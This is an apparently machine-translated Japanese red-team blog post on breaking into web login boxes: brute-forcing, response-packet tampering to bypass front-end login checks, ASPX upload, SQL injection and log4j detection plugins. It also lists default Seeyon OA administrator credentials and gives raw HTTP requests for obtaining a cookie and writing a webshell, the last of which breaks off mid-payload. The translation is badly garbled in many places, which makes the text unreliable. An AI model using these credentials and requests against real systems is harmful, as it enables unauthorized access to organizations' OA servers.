最も基本的なログインボックスから突破します
ログインボックスは、HWが最も発生するキャラクターであり、穴から抜け出すのが最も簡単です。一般的に使用されるテスト方法の一部を以下に示します
ログインブラストのヒント
このようなシステムの爆発に対する2つの解決策があります。
フロントエンドの暗号化アルゴリズムを分析し、スクリプトを書き込み、パスワードを暗号化し、パスワードを123456 000000に修正します。2つの方法には、辞書として一般的なユーザー名を使用して2つの方法が独自の利点と欠点があります。ゲームでより効率的な2番目のものを好み、分析暗号化アルゴリズムはRedチーム検出プロジェクトにより適しています。
爆破されたアカウントのパスワードを使用してバックグラウンドにログインすると、背景のアップロードポイントを見つけ続けることができます
アップロードされたファイル形式を制限するために、こちらの画像タイプを参照してください
ASPXファイル形式タイプを直接追加します
成功したけいれん
戻りパケットパラメーターを変更し、背景
を入力しますウェブサイトのログインステータスがフロントエンドに基づいて判断される場合があり、この時点では、返品パッケージを直接変更してバイパスできます。
フロントエンド判断ログインロジックは、返品パッケージのRET値に基づいて決定されます。返品値が1の場合、ログインが正常にログインされます。
背景を正常に入力しました
プラグインは、一般的なSQLインジェクションとLOG4Jの脆弱性を検出します
推奨SQLインジェクションプラグイン3https://GITHUB.COM/SMXIAZI/XIA_SQL
基本原則は、返されたデータの長さに基づいて複数のデータパケットを送信することにより、注入があるかどうかを判断することです。
パッシブスキャンに加えて、シングルとダブルの引用符を手動で追加して、返品パッケージを表示することもできます。同様のエラーがある場合、SQL注入がある可能性があります。
SQLMAPシャトル
log4jプラグインはhttps://github.com/thekingofduck/burpfakeipを推奨しました
バーププラグインファズパケットを介したヘッダーヘッダー
ログインボックスでlog4jの脆弱性を正常に検出しました
しかし、多くのDNSLOGプラットフォームはファイアウォールによって黒にマークされていることに注意する必要があるため、シーイを使用したり、DNSLOGプラットフォームを自分で構築することをお勧めします
システムデフォルトのパスワード +背景1Day Exploit
攻撃的および防御的な競争がますます頻繁になるにつれて、パブリックネットワークで直接悪用できるフロントエンドの脆弱性はますます少なく、それらのほとんどはバッチスキャンによって修正されていますが、システムのデフォルトパスワードを使用して1日と組み合わせることができます。
デフォルトのパスワードが存在する場合、admin/admin123
タスクをスケジュールするか、背景を入力するときにタスクを脱着することにより、コマンドを実行できます。
OAシステムに遭遇すると多くの場合、OA脆弱性検出ツールを使用して、抜け穴なしでスキャンしてあきらめます。実際、この種のOAシステムでデフォルトのパスワードに問題がある可能性があります。
デフォルトのパスワード
システム管理者:システム/システム
グループ管理者(A8-V5グループバージョン)Group-Admin/123456
ユニット管理者(A8-V5 Enterprise Edition)Admin1/Admin123456
監査管理者(すべてのバージョン)Audit-Admin/Seeyon123456
フロントデスクでアカウントのパスワードを使用するときにログインできない場合があります。次のデータパケットを送信して、Cookieを取得できます。
POST/SEYYON/REST/認証/UCPCLOGIN HTTP/1.1
host:
user-agent: mozilla/5.0(Windows NT 10.0; RV:78.0)Gecko/20100101 Firefox/78.0
Content-Length: 71
Content-Type:アプリケーション/x-www-form-urlencoded
Accept-Encoding: GZIP
useragentfrom=xxlogin_username=audit-adminlogin_password=seeyon123456
Cookieを取得した後、パッチの新しいバックグラウンドホールを使用して、詳細に使用できます。今回は、コピーファイルの背景穴を使用します。
しかし、実際の戦闘の後、私はこの抜け穴にいくつかの落とし穴があることを発見し、ウェブシェルに書き込むときにエラーが報告されました。
post /seeyon/ajax.do?method=ajaxactionmanagername=portalcssssmanagerrnd=111 http/1.1
Accept: */*
content-type:アプリケーション/x-www-form-urlencoded; charset=utf-8
Content-Length: 70
HOST: 192.168.91.17
Connection: Keep-Alive
user-agent: apache-httpclient/4.5.13(Java/1.8.0_321)
Accept-Encoding: gzip、deflate
引数=%5B%22
Recommended Comments